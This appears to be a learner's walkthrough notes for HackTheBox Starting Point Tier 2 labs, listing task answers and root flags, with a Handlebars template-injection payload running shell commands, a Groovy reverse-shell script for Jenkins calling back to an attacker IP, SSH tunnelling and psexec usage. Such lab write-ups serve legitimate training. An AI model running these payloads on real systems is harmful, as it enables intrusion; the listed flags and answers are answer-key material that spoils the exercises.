HackTheBox-starting-point-02

学习成果

在第二层中，您将更深入地研究网络安全笔测试的世界，重点关注适合初学者的网络利用技术。您将了解 SQL 注入、服务器端模板注入、远程文件包含的基础知识，并掌握如何有效使用 Web/反向 Shell。基于第一层的知识，您将应用这些技术来利用之前展示的各种服务，确保亲身了解其漏洞。

此外，您还将学习如何导航 Jenkins（一种流行的自动化服务器）来登录并上传 Groovy Shell 脚本，这是渗透测试的一项宝贵技能。最后，您将通过了解如何将文件上传到 S3 存储桶来完善您的专业知识，为您提供在网络安全领域脱颖而出的全面技能。这一层可让您在笔测试之旅中更进一步。

• 了解如何匿名连接 FTP、SMB、Telnet、Rsync 和 RDP。
• 了解如何使用 Nmap 识别开放端口。
• 了解如何连接到 MongoDB 服务器。
• 了解如何将文件上传到 S3 存储桶。

TASK 1

What does the acronym SQL stand for?

Structured Query Language

Hide Answer

TASK 2

What is one of the most common type of SQL vulnerabilities?

SQL injection

Hide Answer

TASK 3

What is the 2021 OWASP Top 10 classification for this vulnerability?

A03:2021-Injection

Hide Answer

TASK 4

What does Nmap report as the service and version that are running on port 80 of the target?

Apache httpd 2.4.38 ((Debian))

Hide Answer

TASK 5

What is the standard port used for the HTTPS protocol?

443

Hide Answer

TASK 6

What is a folder called in web-application terminology?

directory

Hide Answer

TASK 7

What is the HTTP response code is given for ‘Not Found’ errors?

404

Hide Answer

TASK 8

Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?

dir

Hide Answer

TASK 9

What single character can be used to comment out the rest of a line in MySQL?

#

Hide Answer

TASK 10

If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?

Congratulations

Hide Answer

SUBMIT FLAG

Submit root flag

e3d0796d002a446c0e622226f42e9672

Hide Answer

TASK 1

During our scan, which port do we find serving MySQL?

3306

Hide Answer

TASK 2

What community-developed MySQL version is the target running?

MariaDB

Hide Answer

TASK 3

When using the MySQL command line client, what switch do we need to use in order to specify a login username?

-u

Hide Answer

TASK 4

Which username allows us to log into this MariaDB instance without providing a password?

root

Hide Answer

TASK 5

In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?

Hide Answer

TASK 6

In SQL, what symbol do we need to end each query with?

;

Hide Answer

TASK 7

There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that’s unique to this host?

htb

Hide Answer

SUBMIT FLAG

Submit root flag

7b4bec00d1a39e3dd4e021ec3d915da8

Hide Answer

TASK 1

What Nmap scanning switch employs the use of default scripts during a scan?

-sC

Show Answer

TASK 2

What service version is found to be running on port 21?

vsftpd 3.0.3

Show Answer

TASK 3

What FTP code is returned to us for the “Anonymous FTP login allowed” message?

230

Show Answer

TASK 4

After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?

anonymous

Show Answer

TASK 5

After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?

get

Show Answer

TASK 6

What is one of the higher-privilege sounding usernames in ‘allowed.userlist’ that we download from the FTP server?

admin

Show Answer

TASK 7

What version of Apache HTTP Server is running on the target host?

Apache httpd 2.4.41

Show Answer

TASK 8

What switch can we use with Gobuster to specify we are looking for specific filetypes?

-x

Show Answer

TASK 9

Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?

login.php

Show Answer

SUBMIT FLAG

Submit root flag

c7110277ac44d78b6a9fff2232434d16

Show Answer

TASK 1

When visiting the web service using the IP address, what is the domain that we are being redirected to?

unika.htb

Hide Answer

TASK 2

Which scripting language is being used on the server to generate webpages?

php

Hide Answer

TASK 3

What is the name of the URL parameter which is used to load different language versions of the webpage?

page

Hide Answer

TASK 4

Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts”, “minikatz.exe”

…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts

Hide Answer

TASK 5

Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts”, “minikatz.exe”

//10.10.14.6/somefile

Hide Answer

TASK 6

What does NTLM stand for?

New Technology Lan Manager

Hide Answer

TASK 7

Which flag do we use in the Responder utility to specify the network interface?

-I

Hide Answer

TASK 8

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.

John The Ripper

Hide Answer

TASK 9

What is the password for the administrator user?

badminton

Hide Answer

TASK 10

We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

5985

Hide Answer

SUBMIT FLAG

Submit root flag

ea81b7afddd03efaa0945333ed147fac

Hide Answer

TASK 1

How many TCP ports are open?

2

Hide Answer

TASK 2

What is the domain of the email address provided in the “Contact” section of the website?

thetoppers.htb

Hide Answer

TASK 3

In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

/etc/hosts

Hide Answer

TASK 4

Which sub-domain is discovered during further enumeration?

s3.thetoppers.htb

Hide Answer

TASK 5

Which service is running on the discovered sub-domain?

Amazon S3

Hide Answer

TASK 6

Which command line utility can be used to interact with the service running on the discovered sub-domain?

awscli

Hide Answer

TASK 7

Which command is used to set up the AWS CLI installation?

aws configure

Hide Answer

TASK 8

What is the command used by the above utility to list all of the S3 buckets?

aws s3 ls

Hide Answer

TASK 9

This server is configured to run files written in what web scripting language?

php

Hide Answer

SUBMIT FLAG

Submit root flag

a980d99281a28d638ac68b9bf9453c2b

Hide Answer

TASK 1

Which service version is found to be running on port 80?

***** *.**.2

nginx 1.14.2

Hide Answer

TASK 2

What is the 3-digit HTTP status code returned when you visit http://{machine IP}/?

---

302

Hide Answer

TASK 3

What is the virtual host name the webpage expects to be accessed by?

********.**b

ignition.htb

Hide Answer

TASK 4

What is the full path to the file on a Linux computer that holds a local list of domain name to IP address pairs?

/***/****s

/etc/hosts

Hide Answer

TASK 5

Use a tool to brute force directories on the webserver. What is the full URL to the Magento login page?

//./****n

http://ignition.htb/admin

Hide Answer

TASK 6

Look up the password requirements for Magento and also try searching for the most commong passwords of 2023. Which password provides access to the admin account?

********3

qwerty123

Hide Answer

SUBMIT FLAG

Submit root flag

---

797d6c988d9dc5865e010b9410f247e0

Hide Answer

TASK 1

What TCP ports does nmap identify as open? Answer with a list of ports seperated by commas with no spaces, from low to high.

22,80

Show Answer

TASK 2

What software is running the service listening on the http/web port identified in the first question?

Node.js

Show Answer

TASK 3

What is the name of the Web Framework according to Wappalyzer?

Express

Show Answer

TASK 4

What is the name of the vulnerability we test for by submitting {{7*7}}?

Server Side Template Injection

Show Answer

TASK 5

What is the templating engine being used within Node.JS?

Handlebars

Show Answer

TASK 6

What is the name of the BurpSuite tab used to encode text?

Decoder

Show Answer

TASK 7

In order to send special characters in our payload in an HTTP request, we’ll encode the payload. What type of encoding do we use?

URL

Show Answer

TASK 8

When we use a payload from HackTricks to try to run system commands, we get an error back. What is “not defined” in the response error?

require

Show Answer

TASK 9

What variable is the name of the top-level scope in Node.JS?

global

Show Answer

TASK 10

By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?

root

Show Answer

SUBMIT FLAG

Submit root flag

6b258d726d287462d60c103d0142a81c

Show Answer

{{#with "s" as |string|}}
 {{#with "e"}}
 {{#with split as |conslist|}}
 {{this.pop}}
 {{this.push (lookup string.sub "constructor")}}
 {{this.pop}}
 {{#with string.split as |codelist|}}
 {{this.pop}}
{{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
 {{this.pop}}
 {{#each conslist}}
 {{#with (string.sub.apply 0 codelist)}}
 {{this}}
 {{/with}}
 {{/each}}
 {{/with}}
 {{/with}}
 {{/with}}
{{/with}}

TASK 1

How many TCP ports are open?

2

Hide Answer

TASK 2

What is the name of the directory that is available on the FTP server?

mail_backup

Hide Answer

TASK 3

What is the default account password that every new member on the “Funnel” team should change as soon as possible?

funnel123#!#

Hide Answer

TASK 4

Which user has not changed their default password yet?

christine

Hide Answer

TASK 5

Which service is running on TCP port 5432 and listens only on localhost?

postgresql

Hide Answer

TASK 6

Since you can’t access the previously mentioned service from the local machine, you will have to create a tunnel and connect to it from your machine. What is the correct type of tunneling to use? remote port forwarding or local port forwarding?

local port forwarding

Hide Answer

TASK 7

What is the name of the database that holds the flag?

secrets

Hide Answer

TASK 8

Could you use a dynamic tunnel instead of local port forwarding? Yes or No.

Yes

Hide Answer

SUBMIT FLAG

Submit root flag

cf277664b1771217d7006acdea006db1

Hide Answer

本地端口转发

//ssh -L 本地地址:端口 用户名@远程主机
ssh -L 1111:127.0.0.1:5432 christine@10.129.228.195
//本地连接
psql -U christine -h 127.0.0.1 -p 1111

远程端口转发

//ssh -D 本地端口 用户@远程地址
ssh -D 1111 christine@10.129.16.51

配置ssh ssh -D 1111 christine@10.129.16.51

配置/etc/proxychains4.conf

连接psql数据库

TASK 1

What does the acronym CVE stand for?

Common Vulnerabilities and Exposures

Hide Answer

TASK 2

What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

Confidentiality, Integrity, Availability

Hide Answer

TASK 3

What is the version of the service running on port 8080?

Jetty 9.4.39.v20210325

Hide Answer

TASK 4

What version of Jenkins is running on the target?

2.289.1

Hide Answer

TASK 5

What type of script is accepted as input on the Jenkins Script Console?

Groovy

Hide Answer

TASK 6

What would the “String cmd” variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

cmd.exe

Hide Answer

TASK 7

What is a different command than “ip a” we could use to display our network interfaces’ information on Linux?

ifconfig

Hide Answer

TASK 8

What switch should we use with netcat for it to use UDP transport mode?

-u

Hide Answer

TASK 9

What is the term used to describe making a target host initiate a connection back to the attacker host?

reverse shell

Hide Answer

SUBMIT FLAG

Submit root flag

9cdfb439c7876e703e307864c9167a15

Hide Answer

Jenkins rce脚本

String host="{your_IP}";
int port=8000;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

TASK 1

Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?

-Pn

Hide Answer

TASK 2

What does the 3-letter acronym SMB stand for?

Server Message Block

Hide Answer

TASK 3

What port does SMB use to operate at?

445

Hide Answer

TASK 4

What command line argument do you give to smbclient to list available shares?

-l

Hide Answer

TASK 5

What character at the end of a share name indicates it’s an administrative share?

$

Hide Answer

TASK 6

Which Administrative share is accessible on the box that allows users to view the whole file system?

C$

Hide Answer

TASK 7

What command can we use to download the files we find on the SMB Share?

get

Hide Answer

TASK 8

Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?

psexec.py

Hide Answer

SUBMIT FLAG

Submit root flag

f751c19eda8f61ce81827e6930a1f40c

Hide Answer

impacket-psexec

python psexec.py username:password@hostIP

smbclicent

smbclient //ip/C$ -U administrator